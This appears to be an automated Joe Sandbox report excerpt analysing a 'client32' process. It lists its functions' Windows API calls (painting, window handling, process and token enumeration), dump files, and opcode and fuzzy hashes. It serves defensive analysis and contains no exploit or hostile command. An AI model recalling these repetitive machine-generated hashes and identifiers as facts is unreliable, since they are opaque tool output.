                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_memsetwsprintf
                                                                                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                                                                                                                    • API String ID: 3453958691-770455996
                                                                                                                                                                                                    • Opcode ID: a4b3b1cb6e38c4758c195a3c9de24e958abacf994ffaf34fd91b8a055f761e2f
                                                                                                                                                                                                    • Instruction ID: 0e393dd9f50b4abf726b269e2623b848e1bd90be6afddd879db765a1a84127a1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4b3b1cb6e38c4758c195a3c9de24e958abacf994ffaf34fd91b8a055f761e2f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A813AB5600605AFE364DBA5C990EABF7F9AF8C304F10450DF6AA97241DA71FC41CB60
                                                                                                                                                                                                    Function 11015470 Relevance: 43.7, APIs: 29, Instructions: 170COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 1101549F
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 110154B7
                                                                                                                                                                                                    • _memset.LIBCMT ref: 110154C5
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 110154E1
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110154F5
                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 11015500
                                                                                                                                                                                                    • BeginPath.GDI32(00000000), ref: 1101550D
                                                                                                                                                                                                    • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015530
                                                                                                                                                                                                    • EndPath.GDI32(00000000), ref: 11015537
                                                                                                                                                                                                    • PathToRegion.GDI32(00000000), ref: 1101553E
                                                                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015550
                                                                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015566
                                                                                                                                                                                                    • CreatePen.GDI32(00000000,00000002,?), ref: 11015580
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1101558E
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1101559E
                                                                                                                                                                                                    • GetRgnBox.GDI32(00000000,?), ref: 110155AB
                                                                                                                                                                                                    • OffsetRgn.GDI32(00000000,?,00000000), ref: 110155CA
                                                                                                                                                                                                    • FillRgn.GDI32(00000000,00000000,?), ref: 110155D9
                                                                                                                                                                                                    • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 110155EC
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110155F9
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015603
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1101560D
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 11015616
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1101561F
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 11015628
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015632
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1101563B
                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 11015645
                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 11015659
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3702029449-0
                                                                                                                                                                                                    • Opcode ID: f9345a281c66595ab423393b8d545c26d76a2e4da1908697bef58f556e94efce
                                                                                                                                                                                                    • Instruction ID: 1c6fdd3f784209e1156a4ff31251cb138f082964e1cd822c4cbcc4281ff6dda7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9345a281c66595ab423393b8d545c26d76a2e4da1908697bef58f556e94efce
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2851FC75A01229AFDB11DBA4CC88FAEF7B9FF89304F108199F605D7244DB749A448F62
                                                                                                                                                                                                    Function 110492D0 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 280COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
                                                                                                                                                                                                      • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                      • Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
                                                                                                                                                                                                      • Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A
                                                                                                                                                                                                      • Part of subcall function 110424D0: SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 1104253A
                                                                                                                                                                                                      • Part of subcall function 110424D0: GetWindowLongA.USER32(00000000,000000F0), ref: 11042541
                                                                                                                                                                                                      • Part of subcall function 110424D0: IsWindow.USER32(00000000), ref: 1104254E
                                                                                                                                                                                                      • Part of subcall function 110424D0: GetWindowRect.USER32(00000000,11049320), ref: 11042565
                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 11049334
                                                                                                                                                                                                    • WindowFromPoint.USER32(?,?,?,?,00000000), ref: 1104935B
                                                                                                                                                                                                    • GetClassNameA.USER32(00000000,?,00000040), ref: 1104936D
                                                                                                                                                                                                    • WaitForInputIdle.USER32(?,000003E8), ref: 11049488
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 1104949B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 110494A4
                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 110494AD
                                                                                                                                                                                                    • EnumWindows.USER32(110425D0,?), ref: 11049504
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 11049520
                                                                                                                                                                                                    • WindowFromPoint.USER32(?,?,?,?,?,?,?,00000000), ref: 1104953A
                                                                                                                                                                                                    • GetClassNameA.USER32(00000000,?,00000040), ref: 11049549
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ClassCloseCursorFromHandleNamePointRect$EnumIdleInputLongMessageOpenSendVersionWaitWindows_memset_strncpy
                                                                                                                                                                                                    • String ID: "%sNSClientTB.exe"$'$*ExitMetroBreak$*ExitMetroCloseDelay$ActivateStui=%d, @%d,%d, actwin=%x [%s]$ActivateStui=-1, @%d,%d, actwin=%x [%s]$Client$NSMCoolbar
                                                                                                                                                                                                    • API String ID: 4093120923-2853765610
                                                                                                                                                                                                    • Opcode ID: a37fe7b023270c55d5fac800e6c82e3ef41093a7139e55b8864d2da1d5655942
                                                                                                                                                                                                    • Instruction ID: 1967bb51930ead73ce48ca5e19d163332f2271a687d5ff16e8e37c73a50f3493
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a37fe7b023270c55d5fac800e6c82e3ef41093a7139e55b8864d2da1d5655942
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82A1C575E01229AFDB11CFA0CCC5FAAB7B9EB4A704F1041F9E919A7280E7316944CF61
                                                                                                                                                                                                    Function 110ED290 Relevance: 36.2, APIs: 24, Instructions: 222windowmemoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 110ED2AE
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000F), ref: 110ED2C2
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 110ED33A
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 110ED34B
                                                                                                                                                                                                    • RealizePalette.GDI32(00000000), ref: 110ED351
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110ED36C
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000001), ref: 110ED380
                                                                                                                                                                                                    • RealizePalette.GDI32(00000000), ref: 110ED383
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110ED38B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1969595663-0
                                                                                                                                                                                                    • Opcode ID: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
                                                                                                                                                                                                    • Instruction ID: 99ab53906cf2362fb71f393f1a059b673ec6ad63d3e9dfc730451934018f7e7b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 747193B1E01229AFDB01DFE9CC89BEEB7B9FF88714F148056FA15E7244D67499008B61
                                                                                                                                                                                                    Function 111032F0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 239libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,24DE4E77,00000001,?,?,00000000,11185E66,000000FF,?,1110421F,00000000,?,?,?), ref: 1110332D
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 111347F3
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11134814
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11134824
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 11134841
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 1113484D
                                                                                                                                                                                                      • Part of subcall function 111347D0: _memset.LIBCMT ref: 11134867
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,1110421F,00000000,?,?,?), ref: 1110337F
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 111033B6
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 1110343F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 111034C1
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 111034E3
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 111034F0
                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11103509
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,?,1110421F), ref: 11103570
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,1110421F), ref: 11103597
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,1110421F), ref: 111035EF
                                                                                                                                                                                                      • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110313E
                                                                                                                                                                                                      • Part of subcall function 11103110: EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
                                                                                                                                                                                                      • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110314D
                                                                                                                                                                                                      • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 111031A0
                                                                                                                                                                                                      • Part of subcall function 11103110: LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
                                                                                                                                                                                                      • Part of subcall function 110F3BB0: WaitForSingleObject.KERNEL32(?,00000000,?,?,111049C5,?,TerminateVistaUI), ref: 110F3BC1
                                                                                                                                                                                                      • Part of subcall function 110F3BB0: InterlockedExchange.KERNEL32(?,00000000), ref: 110F3BCD
                                                                                                                                                                                                      • Part of subcall function 110F3BB0: CloseHandle.KERNEL32(00000000), ref: 110F3BD8
                                                                                                                                                                                                      • Part of subcall function 110F3BB0: InterlockedIncrement.KERNEL32(111EC5B4), ref: 110F3C05
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 111035F6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103646
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103651
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HandleLibrary$AddressProc$CloseCountFreeTick$CriticalErrorInterlockedLastLoadModuleOpenProcessSectionToken$EnterExchangeIncrementInformationLeaveObjectSingleVersionWait_memset
                                                                                                                                                                                                    • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$psapi.dll
                                                                                                                                                                                                    • API String ID: 555709589-617439319
                                                                                                                                                                                                    • Opcode ID: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
                                                                                                                                                                                                    • Instruction ID: 7102d60838122e4a6cb8a6baed9df5fda1baf24c5a04c60c3b4407c25d2de74c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80A14975D0426A9FDB249F558DC5ADEFBB4BB08304F4085EEE659E3240D7705AC08F61
                                                                                                                                                                                                    Function 687F6924 Relevance: 28.8, APIs: 19, Instructions: 273COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT(?,000000FF,00000024), ref: 687F694D
                                                                                                                                                                                                    • _get_daylight.MSVCR100(?), ref: 687F6989
                                                                                                                                                                                                    • _get_dstbias.MSVCR100(?), ref: 687F699B
                                                                                                                                                                                                    • _get_timezone.MSVCR100(?), ref: 687F69AD
                                                                                                                                                                                                    • _gmtime64_s.MSVCR100(?,?), ref: 687F69E1
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 687F6A07
                                                                                                                                                                                                    • _gmtime64_s.MSVCR100(?,?), ref: 687F6A13
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 68809DE1
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 68809DEB
                                                                                                                                                                                                    • _errno.MSVCR100 ref: 68809DF7
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100 ref: 68809E01
                                                                                                                                                                                                    • _gmtime64_s.MSVCR100(?,?), ref: 68809E3A
                                                                                                                                                                                                    • __allrem.LIBCMT ref: 68809EA5
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68809EC1
                                                                                                                                                                                                    • __allrem.LIBCMT ref: 68809ED8
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 68809EF6
                                                                                                                                                                                                    • __allrem.LIBCMT ref: 68809F0D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __allrem_errno_gmtime64_s$Unothrow_t@std@@@__ehfuncinfo$??2@_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezone_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3568092448-0
                                                                                                                                                                                                    • Opcode ID: 6490e0a55d3d3f254444212492ff7b0cac055b1ec5b8daf744decb3ffd3c3ea4
                                                                                                                                                                                                    • Instruction ID: 594a1202e5a92d0c4d84a6a79bf06f869ab7e168bda8dcf0205ca8ca3ca39a83
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6490e0a55d3d3f254444212492ff7b0cac055b1ec5b8daf744decb3ffd3c3ea4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F68107B5A40705ABE7149F7ECD84B6B73E9AF41324F90853AE521D7780EB70DA028B60
                                                                                                                                                                                                    Function 687EEAAD Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 233COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6880D3AA
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6880D3DF
                                                                                                                                                                                                    • atol.MSVCR100(687EEAA8,687EEAA8,00000010,FFFF0000,00000000,00000000), ref: 6880D469
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::$atol
                                                                                                                                                                                                    • String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
                                                                                                                                                                                                    • API String ID: 2083219425-3945972591
                                                                                                                                                                                                    • Opcode ID: 7efc806dc9baede45c3a48c49bccc09f373cf1a6363b1d1220ee70e7fbac49f2
                                                                                                                                                                                                    • Instruction ID: b8796a5c6ba03ccfc504ff1202db4f086799278df0dbb58ea5f5da93b43b6850
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7efc806dc9baede45c3a48c49bccc09f373cf1a6363b1d1220ee70e7fbac49f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F271D3769442189AEB10D7ACCD8CFED77B8AF46308FC04D5AF156A7080EF746A84CB65
